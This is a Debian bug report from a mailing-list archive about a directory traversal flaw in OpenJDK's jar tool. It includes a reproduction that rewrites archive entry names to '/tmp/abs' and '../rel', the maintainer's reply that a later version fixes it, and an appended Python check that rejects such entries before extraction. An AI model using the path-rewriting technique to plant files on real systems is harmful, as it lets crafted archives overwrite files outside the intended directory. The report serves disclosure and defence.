openjdk team mailing list archive

Bug#774953: jar(1): directory traversal

Control: fixed -1  7u79-2.5.5-1

Hi,

On Fri, Jan 09, 2015 at 03:17:29PM +0300, Alexander Cherepanov wrote:
> Package: openjdk-7-jdk
> Version: 7u71-2.5.3-2
> Tags: security
> 
> jar(1) is susceptible to a directory traversal vulnerability. While
> extracting an archive, it will happily use absolute and relative paths taken
> from the archive. This can be exploited by a malicious archive to write
> files outside the current directory.
> 
> For example, let's create a sample archive:
> 
> $ mkdir Xtmp/ XX/
> $ touch Xtmp/abs XX/rel
> $ jar -cMvf test.jar Xtmp/abs XX/rel
> $ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar
> $ rm -r Xtmp/ XX/
> 
> and then test it:
> 
> $ ls /tmp/abs ../rel
> ls: cannot access /tmp/abs: No such file or directory
> ls: cannot access ../rel: No such file or directory
> 
> $ jar -xvf test.jar
> extracted: /tmp/abs
> extracted: ../rel
> 
> $ ls /tmp/abs ../rel
> ../rel  /tmp/abs
> 
> My `jar` points to /etc/alternatives/jar, which points to
> /usr/lib/jvm/java-7-openjdk-amd64/bin/jar .
> 
> Not sure if this is just CVE-2005-1080 not fixed or something else. But
> please note that CVE-2005-1080 talks about .. only.

This should be fixed with 7u79-2.5.5-1.

Regards,
Salvatore
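
A pre-extraction check for the entry names shown in the report above, as an added example that is not part of the original messages or of OpenJDK. It lists archive entries whose names are absolute or climb above the extraction directory with `..`; the function names and the in-memory sample archive are constructed for illustration.

```python
import io
import zipfile


def unsafe_entries(archive):
    """Return (entry name, reason) for names that resolve outside the extraction directory."""
    findings = []
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            # Treat backslashes as separators too, so the check is platform-independent.
            name = info.filename.replace("\\", "/")
            if name.startswith("/") or name[1:2] == ":":
                findings.append((info.filename, "absolute path"))
                continue
            depth = 0  # directory depth relative to the extraction root
            for part in name.split("/"):
                if part in ("", "."):
                    continue
                depth += -1 if part == ".." else 1
                if depth < 0:
                    findings.append((info.filename, "climbs above root via '..'"))
                    break
    return findings


def build_sample():
    """Constructed in-memory archive: the two entry names from the report plus benign ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in ("/tmp/abs", "../rel", "META-INF/MANIFEST.MF",
                     "com/example/A.class", "lib/../../escape", "lib/../ok.txt"):
            zf.writestr(name, b"")
    return io.BytesIO(buf.getvalue())


if __name__ == "__main__":
    for name, reason in unsafe_entries(build_sample()):
        print(f"REJECT {name}: {reason}")
```

The check only inspects names in the central directory, so it can run on an untrusted archive before anything is written to disk.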